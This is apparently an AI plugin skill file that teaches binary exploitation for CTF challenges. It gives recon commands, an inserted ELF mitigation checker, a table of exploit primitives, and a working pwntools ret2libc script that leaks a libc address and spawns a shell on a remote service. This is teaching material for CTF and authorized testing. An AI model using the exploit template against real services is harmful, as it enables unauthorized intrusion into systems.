From cybersec-toolkit
Guides through binary exploitation CTF challenges: buffer overflows, ROP, format strings, heap, and kernel pwn. Provides a decision tree, exploit primitive catalog, and pwntools integration.
Install: `npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkit`

Slash command: `/cybersec-toolkit:ctf-pwn`

Summary Claude sees in its skill listing (used to decide when to auto-load this skill): Analyzes ELF binaries for exploitation vectors using checksec, ROPgadget, and pwntools. Covers buffer overflow and ROP chain development for CTF and authorized security assessments.
The MCP server runs pwntools through a dedicated venv at `~/.ctf-venvs/pwntools/`. If missing:

```bash
wsl.exe bash -lc "mkdir -p ~/.ctf-venvs && python3 -m venv ~/.ctf-venvs/pwntools && ~/.ctf-venvs/pwntools/bin/pip install pwntools z3-solver"
```

Then use it: `run_script(code, venv="pwntools")`.
Recon:

```bash
file ./vuln
checksec --file=./vuln      # or: rabin2 -I ./vuln
strings ./vuln | head -50
nm ./vuln | head -30        # symbols if not stripped
```

Note: RELRO, Canary, NX, PIE, arch (x86 / x86_64 / arm / mips), libc version.
If a libc is provided, identify it:

```bash
strings libc.so.6 | grep "GNU C Library"
# or
./vuln_pwntools_helper      # see below
```

libc-database and libc.rip (web): find offsets by leaked function addresses.
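The recon note above (RELRO, canary, NX, PIE) and the libc identification step both come down to reading ELF program headers. The following is an added example, not code from cybersec-toolkit, that does exactly that with the standard library: it derives the four checksec columns from the PT_GNU_STACK, PT_GNU_RELRO and PT_DYNAMIC headers and the `__stack_chk_fail` symbol heuristic, and pulls the GNU build-id note plus the "GNU C Library" banner out of a libc so it can be matched against libc-database. The file name `elfcheck.py` and the fixture returned by `build_sample_elf()` (a constructed, non-loadable ELF image) are assumptions made for the example.

```python
"""Added example, not part of cybersec-toolkit: read the ELF program headers of
./vuln or a provided libc with only the standard library and report RELRO, canary,
NX and PIE plus the GNU build-id and glibc version banner used to identify a libc."""
import re
import struct
import sys

ELF64_HDR = "<16sHHIQQQIHHHHHH"   # Elf64_Ehdr, little-endian
ELF64_PHDR = "<IIQQQQQQ"          # Elf64_Phdr
ELF64_DYN = "<qQ"                 # Elf64_Dyn
ET_EXEC, ET_DYN, EM_X86_64 = 2, 3, 62
PT_DYNAMIC, PT_NOTE, PT_GNU_STACK, PT_GNU_RELRO = 2, 4, 0x6474E551, 0x6474E552
PF_X, NT_GNU_BUILD_ID = 1, 3
DT_NULL, DT_BIND_NOW, DT_FLAGS, DF_BIND_NOW = 0, 24, 30, 8
GLIBC_BANNER = re.compile(rb"GNU C Library \(([^)]+)\)[^\n]*?release version (\d+\.\d+)")

def parse_elf(data):
    """Return (e_type, program headers) for a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a little-endian ELF64 image")
    hdr = struct.unpack_from(ELF64_HDR, data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    phdrs = []
    for i in range(e_phnum):
        p_type, p_flags, p_off, _, _, p_filesz, _, _ = struct.unpack_from(
            ELF64_PHDR, data, e_phoff + i * e_phentsize)
        phdrs.append({"type": p_type, "flags": p_flags, "offset": p_off, "filesz": p_filesz})
    return e_type, phdrs

def dynamic_entries(data, phdrs):
    """Yield (d_tag, d_val) pairs from the PT_DYNAMIC segment, stopping at DT_NULL."""
    for p in phdrs:
        if p["type"] != PT_DYNAMIC:
            continue
        for off in range(p["offset"], p["offset"] + p["filesz"], 16):
            tag, val = struct.unpack_from(ELF64_DYN, data, off)
            if tag == DT_NULL:
                return
            yield tag, val

def check_mitigations(data):
    """Derive the checksec columns from the headers instead of from a tool."""
    e_type, phdrs = parse_elf(data)
    stack = [p for p in phdrs if p["type"] == PT_GNU_STACK]
    # NX needs PT_GNU_STACK without PF_X; no header at all means an executable stack on x86.
    nx = bool(stack) and not (stack[0]["flags"] & PF_X)
    relro = "none"
    if any(p["type"] == PT_GNU_RELRO for p in phdrs):
        relro = "partial"       # GOT page made read-only after relocation ...
        for tag, val in dynamic_entries(data, phdrs):
            if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW):
                relro = "full"  # ... and bound eagerly, so the GOT is never writable at runtime
    return {"relro": relro,
            "canary": b"__stack_chk_fail" in data,  # same symbol heuristic checksec uses
            "nx": nx,
            "pie": e_type == ET_DYN}                 # a shared library is ET_DYN as well

def identify_libc(data):
    """Return the GNU build-id (hex) and glibc version banner, when present."""
    _, phdrs = parse_elf(data)
    build_id = None
    for p in (p for p in phdrs if p["type"] == PT_NOTE):
        off, end = p["offset"], p["offset"] + p["filesz"]
        while off + 12 <= end:                     # Elf64_Nhdr: namesz, descsz, type
            namesz, descsz, n_type = struct.unpack_from("<III", data, off)
            name_off = off + 12
            desc_off = name_off + ((namesz + 3) & ~3)
            if n_type == NT_GNU_BUILD_ID and data[name_off:name_off + namesz] == b"GNU\0":
                build_id = data[desc_off:desc_off + descsz].hex()
            off = desc_off + ((descsz + 3) & ~3)
    m = GLIBC_BANNER.search(data)
    return {"build_id": build_id, "version": m.group(2).decode() if m else None}

def build_sample_elf(nx=True, pie=True, relro="full", canary=True, build_id=b"\x11" * 20):
    """Constructed fixture: a minimal, non-loadable ELF64 image with the requested headers."""
    dyn = struct.pack(ELF64_DYN, DT_FLAGS, DF_BIND_NOW if relro == "full" else 0)
    dyn += struct.pack(ELF64_DYN, DT_NULL, 0)
    note = struct.pack("<III", 4, len(build_id), NT_GNU_BUILD_ID) + b"GNU\0" + build_id
    tail = b"GNU C Library (constructed sample) stable release version 2.35.\n"
    tail += b"__stack_chk_fail\0" if canary else b"puts\0"
    segs = [(PT_GNU_STACK, 6 if nx else 7, 0, 0, 0, 0, 0, 16)]
    if relro != "none":
        segs.append((PT_GNU_RELRO, 4, 0, 0, 0, 0, 0, 1))
    dyn_off = 64 + 56 * (len(segs) + 2)            # past the ehdr and every program header
    note_off = dyn_off + len(dyn)
    segs.append((PT_DYNAMIC, 6, dyn_off, dyn_off, dyn_off, len(dyn), len(dyn), 8))
    segs.append((PT_NOTE, 4, note_off, note_off, note_off, len(note), len(note), 4))
    ehdr = struct.pack(ELF64_HDR, b"\x7fELF\x02\x01\x01" + b"\0" * 9,
                       ET_DYN if pie else ET_EXEC, EM_X86_64, 1, 0, 64, 0, 0,
                       64, 56, len(segs), 64, 0, 0)
    return ehdr + b"".join(struct.pack(ELF64_PHDR, *s) for s in segs) + dyn + note + tail

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf()
    print(check_mitigations(blob))
    print(identify_libc(blob))
```

Run it as `python3 elfcheck.py ./vuln` or `python3 elfcheck.py libc.so.6`; with no argument it analyses the constructed fixture. Inside the pwntools venv the same answers are available from `ELF("./vuln").checksec()`, so the value of the hand-rolled version is seeing which header bits each checksec line actually comes from: "Full RELRO" means both a PT_GNU_RELRO segment and BIND_NOW, which is why a GOT-overwrite primitive is off the table for such a binary, and the canary column is only a symbol heuristic, so a statically linked or stripped binary can fool it.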
Static:
objdump -d -M intel ./vuln
cutter (radare2 GUI) for decompile — both in registry
Look for: gets, strcpy, unbounded read, printf(user_input), integer overflow on size, double free, UAF

Dynamic:
gdb-multiarch ./vuln + pwndbg / gef
cyclic 200 → run → crash → cyclic -l <RIP> to find offset

| Class | Primitive | Tool |
|---|---|---|
| Stack BOF, no canary, NX off | shellcode | pwntools shellcraft.sh() |
| Stack BOF, NX on, ASLR off | ret2win / static ROP | ROPgadget --binary ./vuln |
| Stack BOF, NX+ASLR, libc leak | ret2libc | leak with PUTS@got, calc system, /bin/sh |
| Stack BOF, NX+ASLR, no leak | ret2plt + puts → leak | classic chain |
| Format string | %n write / %s leak | pwntools fmtstr_payload |
| Heap (glibc) | tcache, fastbin, unsorted bin | how2heap, pwndbg heap |
| Use-after-free | dangling pointer abuse | manual python |
| Kernel | KASLR leak, modprobe_path, etc. | manual + qemu |
```python
from pwn import *

elf = context.binary = ELF("./vuln")   # also sets arch/bits for p64()/u64()/ROP
libc = ELF("./libc.so.6")
p = remote("host", 1337)               # or process("./vuln") for local

# leak: puts(puts@got) prints the runtime address of puts, then return to main for a second send
rop = ROP(elf)
rop.puts(elf.got['puts'])              # pwntools picks the argument-passing gadget for the arch
rop.main()
p.sendlineafter(b"> ", b"A" * 40 + rop.chain())   # 40 = offset to the saved return address
leak = u64(p.recvline().strip().ljust(8, b"\x00"))
libc.address = leak - libc.sym['puts']

# pwn
rop = ROP(libc)
rop.raw(rop.find_gadget(['ret']).address)   # stack align: system() expects 16-byte alignment
rop.system(next(libc.search(b"/bin/sh")))
p.sendline(b"A" * 40 + rop.chain())
p.interactive()
```
pwndbg heap, glibc-all-in-one, how2heap (clone if not present)
ROPgadget or ropper
system symbol — check nm first
Use the writeup-template skill. Include the final exploit script verbatim.